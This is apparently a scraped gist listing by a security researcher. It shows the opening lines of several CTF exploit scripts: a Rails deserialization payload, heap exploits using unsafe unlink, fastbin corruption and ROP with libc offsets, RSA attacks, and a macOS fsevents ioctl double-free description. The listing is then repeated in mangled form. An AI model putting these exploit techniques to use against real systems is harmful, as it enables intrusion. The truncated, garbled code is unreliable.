Niklas Baumstark niklasb

## gist:b5280bc856bfc94157b760eb962e7b60
#!/usr/bin/env python
#-*- coding: utf-8 -*-

from pwn import *
import re
import sys
import string
import itertools

# UAF in IndexCursor

## railspwn.rb
require 'yaml'
require 'base64'
require 'erb'

class ActiveSupport
  class Deprecation
    def initialize()
      @silenced = true
    end
    class DeprecatedInstanceVariableProxy

## gracias.py
from sage.all import continued_fraction, Integer, inverse_mod

pubkey = (1696852658826990842058316561963467335977986730245296081842693913454799128341723605666024757923000936875008280288574503060506225324560725525210728761064310034604441130912702077320696660565727540525259413564999213382434231194132697630244074950529107794905761549606578049632101483460345878198682237227139704889943489709170676301481918176902970896183163611197618458670928730764124354693594769219086662173889094843054787693685403229558143793832013288487194871165461567L, 814161885590044357190593282132583612817366020133424034468187008267919006610450334193936389251944312061685926620628676079561886595567219325737685515818965422518820810326234612624290774570873983198113409686391355443155606621049101005048872030700143084978689888823664771959905075795440800042648923901406744546140059930315752131296763893979780940230041254506456283030727953969468933552050776243515721233426119581636614777596169466339421956338478341355508343072697451L, 17101222758731850777

## handicraft.py
from sage.all import *
import base64

def factor(n,b):
    M=1
    print 'start'
    a = 2
    i=0
    for q in primes(b):
        i+=1

## gracias.py
from sage.all import continued_fraction, Integer, inverse_mod

pubkey = (1696852658826990842058316561963467335977986730245296081842693913454799128341723605666024757923000936875008280288574503060506225324560725525210728761064310034604441130912702077320696660565727540525259413564999213382434231194132697630244074950529107794905761549606578049632101483460345878198682237227139704889943489709170676301481918176902970896183163611197618458670928730764124354693594769219086662173889094843054787693685403229558143793832013288487194871165461567L, 814161885590044357190593282132583612817366020133424034468187008267919006610450334193936389251944312061685926620628676079561886595567219325737685515818965422518820810326234612624290774570873983198113409686391355443155606621049101005048872030700143084978689888823664771959905075795440800042648923901406744546140059930315752131296763893979780940230041254506456283030727953969468933552050776243515721233426119581636614777596169466339421956338478341355508343072697451L, 17101222758731850777

## ctfzone_pwn.py
# First stage: unsafe unlink
# Second stage (via a tunnel through a ROP chain): fastbin free pointer corruption

from pwn import *
import struct
import sys

offset_close = 0x00000000000f78b0
offset_env = 0x3c6f38

## sigserver.py
# Implementation based on attack from
# http://www.hpl.hp.com/techreports/1999/HPL-1999-90.pdf
import socket
import telnetlib
import random
from hashlib import sha1
from sage.all import inverse_mod, matrix, vector

TARGET = ('185.143.173.36', 1337)
sock=socket.create_connection(TARGET)

## gist:416b333cb973812b39c085a42f5c19c4
The `FSEVENTS_DEVICE_FILTER_64` command for the fsevents device's `ioctl` method has a race condition bug which can lead to double `free` when the user decides to update the number of devices to 0.

static int
fseventsf_ioctl(struct fileproc *fp, u_long cmd, caddr_t data, vfs_context_t ctx)
{
	fsevent_handle *fseh = (struct fsevent_handle *)fp->f_fglob->fg_data;
	int ret = 0;
	fsevent_dev_filter_args64 *devfilt_args, _devfilt_args;

	OSAddAtomic(1, &fseh->active);

## robot_pwnage.py
import time
# https://github.com/niklasb/ctf-tools/blob/master/pwnlib/tools.py
from pwnlib.tools import *

TARGET=('localhost',5000)
INTERVAL=0

offset_free = 549184
offset_system = 0x456d0

## baby.py
import socket
import telnetlib
import time
import struct
import sys

TARGET=('localhost', 1337)

offset___libc_start_main_ret = 0x203f1
offset_system = 0x00000000000456d0
	#!/usr/bin/env python
	#-- coding: utf-8 --

	from pwn import *
	import re
	import sys
	import string
	import itertools

	# UAF in IndexCursor
	require 'yaml'
	require 'base64'
	require 'erb'

	class ActiveSupport
	class Deprecation
	def initialize()
	@silenced = true
	end
	class DeprecatedInstanceVariableProxy
	from sage.all import continued_fraction, Integer, inverse_mod

	pubkey = (1696852658826990842058316561963467335977986730245296081842693913454799128341723605666024757923000936875008280288574503060506225324560725525210728761064310034604441130912702077320696660565727540525259413564999213382434231194132697630244074950529107794905761549606578049632101483460345878198682237227139704889943489709170676301481918176902970896183163611197618458670928730764124354693594769219086662173889094843054787693685403229558143793832013288487194871165461567L, 814161885590044357190593282132583612817366020133424034468187008267919006610450334193936389251944312061685926620628676079561886595567219325737685515818965422518820810326234612624290774570873983198113409686391355443155606621049101005048872030700143084978689888823664771959905075795440800042648923901406744546140059930315752131296763893979780940230041254506456283030727953969468933552050776243515721233426119581636614777596169466339421956338478341355508343072697451L, 17101222758731850777
	from sage.all import *
	import base64

	def factor(n,b):
	M=1
	print 'start'
	a = 2
	i=0
	for q in primes(b):
	i+=1
	# First stage: unsafe unlink
	# Second stage (via a tunnel through a ROP chain): fastbin free pointer corruption

	from pwn import *
	import struct
	import sys

	offset_close = 0x00000000000f78b0
	offset_env = 0x3c6f38
	# Implementation based on attack from
	# http://www.hpl.hp.com/techreports/1999/HPL-1999-90.pdf
	import socket
	import telnetlib
	import random
	from hashlib import sha1
	from sage.all import inverse_mod, matrix, vector

	TARGET = ('185.143.173.36', 1337)
	sock=socket.create_connection(TARGET)
	The `FSEVENTS_DEVICE_FILTER_64` command for the fsevents device's `ioctl` method has a race condition bug which can lead to double `free` when the user decides to update the number of devices to 0.

	static int
	fseventsf_ioctl(struct fileproc *fp, u_long cmd, caddr_t data, vfs_context_t ctx)
	{
	fsevent_handle fseh = (struct fsevent_handle )fp->f_fglob->fg_data;
	int ret = 0;
	fsevent_dev_filter_args64 *devfilt_args, _devfilt_args;

	OSAddAtomic(1, &fseh->active);
	import time
	# https://github.com/niklasb/ctf-tools/blob/master/pwnlib/tools.py
	from pwnlib.tools import *

	TARGET=('localhost',5000)
	INTERVAL=0

	offset_free = 549184
	offset_system = 0x456d0